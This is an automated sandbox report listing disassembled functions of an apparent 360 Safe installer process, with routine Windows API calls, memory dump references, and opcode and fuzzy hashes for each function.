                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateErrorFileLast_wcslen
                                                                                                                                                                      • String ID: [%d.] __open_file create file(%s) fail! error code is %d
                                                                                                                                                                      • API String ID: 3865106863-2798064650
                                                                                                                                                                      • Opcode ID: d96326cf3355cce016be9604444607bbf0d647c162dab35b32b35c10474c2562
                                                                                                                                                                      • Instruction ID: c817482e6fc4707fc7236baa5939284969a58f704eada3ac8089072e8d630c60
                                                                                                                                                                      • Opcode Fuzzy Hash: d96326cf3355cce016be9604444607bbf0d647c162dab35b32b35c10474c2562
                                                                                                                                                                      • Instruction Fuzzy Hash: 3001A9B1140304FFEB546E70CC29FAA3BAAFF08325F008529FAA7DA1D0D6719454CB50
                                                                                                                                                                      Function 5F525F4C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 40COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 5F52325B: __EH_prolog3.LIBCMT ref: 5F523262
                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 5F525F87
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4158576782.000000005F4D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158731034.000000005F54F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F56F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F575000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F57A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F5BC000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4159004826.000000005F5BF000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CountH_prolog3Tick
                                                                                                                                                                      • String ID: agt.p.360.cn$tr.p.360.cn
                                                                                                                                                                      • API String ID: 3287309161-3328026606
                                                                                                                                                                      • Opcode ID: e03a3178b70137da0f0537b213af2a89e5da64b40b944ecaf423f8cf115ac406
                                                                                                                                                                      • Instruction ID: ba84c914a341efd330d37d54e80a253a782f0e99dc169d8b53db37a04efd6b17
                                                                                                                                                                      • Opcode Fuzzy Hash: e03a3178b70137da0f0537b213af2a89e5da64b40b944ecaf423f8cf115ac406
                                                                                                                                                                      • Instruction Fuzzy Hash: 26F0B4F22023242BD600569A9D54BBB77DDDB94A75F00012EFA15D71C0DF656C4187B4
                                                                                                                                                                      Function 001A66E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • SHGetValueW.SHLWAPI(80000001,Software\360Safe,EnableUE,?,00000000,?,&pid=,&ver=), ref: 001A670E
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Value
                                                                                                                                                                      • String ID: EnableUE$Software\360Safe
                                                                                                                                                                      • API String ID: 3702945584-3756293347
                                                                                                                                                                      • Opcode ID: d66c050cb896e318d4f00c3026742cecf908fb8944d94c3cd7078f9f50e2fb1d
                                                                                                                                                                      • Instruction ID: e29f95df6f1122511143c0c71105476268ebdd7070789d76a752212b6c306f3f
                                                                                                                                                                      • Opcode Fuzzy Hash: d66c050cb896e318d4f00c3026742cecf908fb8944d94c3cd7078f9f50e2fb1d
                                                                                                                                                                      • Instruction Fuzzy Hash: CCE06D72E10208FACB00DBE09C05BCEB7FCAB04705F1081B6A502E2080EA709754CB50
                                                                                                                                                                      Function 00195AFC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Message_memset
                                                                                                                                                                      • String ID: $
                                                                                                                                                                      • API String ID: 2116056029-3993045852
                                                                                                                                                                      • Opcode ID: 6cbd5c709c0cf4bf34dbabb6d94edbe32329bcb822739b2eaa162f1f2dadc732
                                                                                                                                                                      • Instruction ID: f1174133699b2d030f71c69ba89e4dd3e45e18149e337fcb2187a30bb9d12908
                                                                                                                                                                      • Opcode Fuzzy Hash: 6cbd5c709c0cf4bf34dbabb6d94edbe32329bcb822739b2eaa162f1f2dadc732
                                                                                                                                                                      • Instruction Fuzzy Hash: 60E0BF71D002189BEB10DB99DD4ABDEB7F8EB4C714F100165E619B7180E7B6EA048BE5
                                                                                                                                                                      Function 001967E9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • ShowWindow.USER32(?,00000005,D!,0017AFA3,?), ref: 001967FA
                                                                                                                                                                      • ShowWindow.USER32(?,00000000,D!,0017AFA3,?), ref: 00196809
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ShowWindow
                                                                                                                                                                      • String ID: D!
                                                                                                                                                                      • API String ID: 1268545403-911024508
                                                                                                                                                                      • Opcode ID: 618b15a104b9d0bf51c6da0226d58eb04748329b2969fe393295db1bb520a7cc
                                                                                                                                                                      • Instruction ID: 0ba9b6180d6c4121a4174ce26bdfb29edb6ab7c930054fcdbc5e681739e64fe3
                                                                                                                                                                      • Opcode Fuzzy Hash: 618b15a104b9d0bf51c6da0226d58eb04748329b2969fe393295db1bb520a7cc
                                                                                                                                                                      • Instruction Fuzzy Hash: F6E01A31145700FAEA21AB20DC0ABD9BAA1EB20705FA1882AB181620A0E7B12840CA55
                                                                                                                                                                      Function 00182C59 Relevance: 4.8, APIs: 3, Instructions: 340COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: H_prolog3
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 431132790-0
                                                                                                                                                                      • Opcode ID: 43382c89c566047df1a79cefd5c992ac94308cba32c9b50fa856fa8ab6d43727
                                                                                                                                                                      • Instruction ID: 4afd08fb82608be9f8e3e4c6a7b3fee1cd7ff185dea7057bf017282f55c31986
                                                                                                                                                                      • Opcode Fuzzy Hash: 43382c89c566047df1a79cefd5c992ac94308cba32c9b50fa856fa8ab6d43727
                                                                                                                                                                      • Instruction Fuzzy Hash: 53E15A75900609EFCB15EFA4C9819EDBBF5BF28300F10452EF55AA7691EB30AA45CF90
                                                                                                                                                                      Function 00162860 Relevance: 4.8, APIs: 3, Instructions: 286COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • _memset.LIBCMT ref: 001628B3
                                                                                                                                                                      • _malloc.LIBCMT ref: 001629B5
                                                                                                                                                                      • SetLastError.KERNEL32(00000008,00002000,?,00000000), ref: 001629C5
                                                                                                                                                                        • Part of subcall function 00165690: _malloc.LIBCMT ref: 0016569C
                                                                                                                                                                        • Part of subcall function 00165690: SetLastError.KERNEL32(00000008,00000000,0016291E,00000000,00002000,?,00000000), ref: 001656AE
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLast_malloc$_memset
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1834304950-0
                                                                                                                                                                      • Opcode ID: c60c2a6b2cdd2fcad2807329fa1c17e3f7573e89f586d2f5c171568a14896bea
                                                                                                                                                                      • Instruction ID: a23e214d448f7c0fc8a38ce128eaeb9682ff9a3e9b21678b1d90bf05d927e760
                                                                                                                                                                      • Opcode Fuzzy Hash: c60c2a6b2cdd2fcad2807329fa1c17e3f7573e89f586d2f5c171568a14896bea
                                                                                                                                                                      • Instruction Fuzzy Hash: D3B177B19087419BD720DF25D885B6FB7E4BBD8308F14492DF89987241E7B0E958CB93
                                                                                                                                                                      Function 00164CB0 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,00000000,?,?,00000000,?,00000000,?,?,00161043,?), ref: 00164CF6
                                                                                                                                                                      • ReadFile.KERNEL32(?,?,00000008,?,00000000,?,00000000,?,00000000,?,?,00161043,?), ref: 00164D13
                                                                                                                                                                      • SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,?,00000000,?,00000000,?,?,00161043,?), ref: 00164D98
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File$Pointer$Read
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2010065189-0
                                                                                                                                                                      • Opcode ID: f8f3c6149dbd1b091d6829b491b09e703e20e8f0e8df1a03963d126d97ba0f7f
                                                                                                                                                                      • Instruction ID: 9f013aa3db5ee6e7db0060f05bbbffd2cb3c29b04fc449b01fb2a18009516438
                                                                                                                                                                      • Opcode Fuzzy Hash: f8f3c6149dbd1b091d6829b491b09e703e20e8f0e8df1a03963d126d97ba0f7f
                                                                                                                                                                      • Instruction Fuzzy Hash: 0E315971A08301AFD310EF95DD80A6BB3E9EBA8748F10492DF89597280EB70DD648B53
                                                                                                                                                                      Function 001B18C5 Relevance: 4.6, APIs: 3, Instructions: 71COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Rect$ClientH_prolog3Offset
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 236044050-0
                                                                                                                                                                      • Opcode ID: 6225bec5df775dad5710e3d4e1c8a71cb801580dd34eac3547f165c1d4773426
                                                                                                                                                                      • Instruction ID: c2d9dd29c2475b659790efc64f24440ed6937cb8817be3ff83be5f849116ebf4
                                                                                                                                                                      • Opcode Fuzzy Hash: 6225bec5df775dad5710e3d4e1c8a71cb801580dd34eac3547f165c1d4773426
                                                                                                                                                                      • Instruction Fuzzy Hash: 2821D07590021AEFCF01DFE8D8858EEBBBABF58314F51401AF905A7210D730AA51CBA0
                                                                                                                                                                      Function 001C87F5 Relevance: 4.6, APIs: 3, Instructions: 69COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • _memset.LIBCMT ref: 001C8838
                                                                                                                                                                      • __wsplitpath.LIBCMT ref: 001C8845
                                                                                                                                                                        • Part of subcall function 001EEDC6: __wsplitpath_helper.LIBCMT ref: 001EEE08
                                                                                                                                                                      • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 001C8874
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: DiskFreeSpace__wsplitpath__wsplitpath_helper_memset
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1401654830-0
                                                                                                                                                                      • Opcode ID: 0770eff876345d7190df7f151883ae643ee19a68691eb2c426fcf79b379d5c1d
                                                                                                                                                                      • Instruction ID: 555de6dd397eca7e5de80b23d4eff7ae984e7478e8f74780eac95c3aeeaadc85
                                                                                                                                                                      • Opcode Fuzzy Hash: 0770eff876345d7190df7f151883ae643ee19a68691eb2c426fcf79b379d5c1d
                                                                                                                                                                      • Instruction Fuzzy Hash: 9821C97291034CAFDB65DFE8DC859EEB7BDAF09304F11452AE519EB241EB30AA04CB51
                                                                                                                                                                      Function 001AECF0 Relevance: 4.6, APIs: 3, Instructions: 68windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 001AECF7
                                                                                                                                                                        • Part of subcall function 001AB33C: KillTimer.USER32(?,00002710), ref: 001AB344
                                                                                                                                                                        • Part of subcall function 001AEC81: GetModuleHandleW.KERNEL32(?), ref: 001AEC97
                                                                                                                                                                        • Part of subcall function 001AEC81: FindResourceW.KERNEL32(?,?,?), ref: 001AECA8
                                                                                                                                                                        • Part of subcall function 001AEC81: SizeofResource.KERNEL32(?,00000000), ref: 001AECB7
                                                                                                                                                                        • Part of subcall function 001AEC81: LoadResource.KERNEL32(?,00000000), ref: 001AECC1
                                                                                                                                                                        • Part of subcall function 001AEC81: LockResource.KERNEL32(00000000), ref: 001AECC8
                                                                                                                                                                      • GetParent.USER32(000000FF), ref: 001AEDA8
                                                                                                                                                                      • SendMessageW.USER32(00000000,00000BD0,00000000,00000000), ref: 001AEDB8
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Resource$FindH_prolog3HandleKillLoadLockMessageModuleParentSendSizeofTimer
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3209458795-0
                                                                                                                                                                      • Opcode ID: f175d1077bb8b1f47efa6d73eb3882138f25fa8ffcb7fdf02a0f692576e1d264
                                                                                                                                                                      • Instruction ID: 9e0fb9be166d326954acf0a8a39eb033d3d1da202843c222291cb0d497882f80
                                                                                                                                                                      • Opcode Fuzzy Hash: f175d1077bb8b1f47efa6d73eb3882138f25fa8ffcb7fdf02a0f692576e1d264
                                                                                                                                                                      • Instruction Fuzzy Hash: 6521D574700749ABDF11AFB4CC56BAE76E6BF55304F004419F816DB2D2DB70DA119B81
                                                                                                                                                                      Function 00195B5D Relevance: 4.6, APIs: 3, Instructions: 60COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetIpAddrTable.IPHLPAPI(00000000,?,00000000), ref: 00195B74
                                                                                                                                                                      • _malloc.LIBCMT ref: 00195B81
                                                                                                                                                                        • Part of subcall function 001E5674: __FF_MSGBANNER.LIBCMT ref: 001E5697
                                                                                                                                                                        • Part of subcall function 001E5674: __NMSG_WRITE.LIBCMT ref: 001E569E
                                                                                                                                                                        • Part of subcall function 001E5674: RtlAllocateHeap.NTDLL(00000000,?,00000001,00000000,00000000,?,001F05A7,?,00000001,?,?,001F3329,00000018,0023EF60,0000000C,001F33BA), ref: 001E56EB
                                                                                                                                                                      • GetIpAddrTable.IPHLPAPI(00000000,?,00000000,00000000,?,00000000), ref: 00195B97
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddrTable$AllocateHeap_malloc
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3107517213-0
                                                                                                                                                                      • Opcode ID: d87611f817dad8029365883a23142caddc835124a036991716f8c94df4fd3f7f
                                                                                                                                                                      • Instruction ID: 3e1fea2df39e621e484ed739a4c232219929461c42a3c4834124e7a2d1264837
                                                                                                                                                                      • Opcode Fuzzy Hash: d87611f817dad8029365883a23142caddc835124a036991716f8c94df4fd3f7f
                                                                                                                                                                      • Instruction Fuzzy Hash: F7018472900514AFDF26DF99C8C1AFEB3AFAB14354F21056AF443B2001E7745E809761
                                                                                                                                                                      Function 0018F326 Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 0018F32D
                                                                                                                                                                      • PathFileExistsW.SHLWAPI(?,00000000,0022E544,0000005C,00000008), ref: 0018F37D
                                                                                                                                                                      • SHCreateDirectory.SHELL32(00000000,?), ref: 0018F389
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateDirectoryExistsFileH_prolog3Path
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2789380810-0
                                                                                                                                                                      • Opcode ID: 4febc035c6919ad6b1d24ec89faf73f20d6ce80bbaa2b8bdb4179152c26e860f
                                                                                                                                                                      • Instruction ID: 056619c373e60b09345202b4188b4434b745471278f35f22f7e709e6d7a19f12
                                                                                                                                                                      • Opcode Fuzzy Hash: 4febc035c6919ad6b1d24ec89faf73f20d6ce80bbaa2b8bdb4179152c26e860f
                                                                                                                                                                      • Instruction Fuzzy Hash: 04115E31900609ABCB14FFA5DC95AEE7765BF60354F04842CF9155B281EB309B46CFA1
                                                                                                                                                                      Function 001D6C45 Relevance: 4.6, APIs: 3, Instructions: 57fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateFileW.KERNEL32(?,C0000000,00000001,00000000,?,00000080,00000000,?,00198D5A,00000000,?,001D68E0,?,00000000,00000000,00000748), ref: 001D6C90
                                                                                                                                                                      • _wcsncpy.LIBCMT ref: 001D6CB1
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
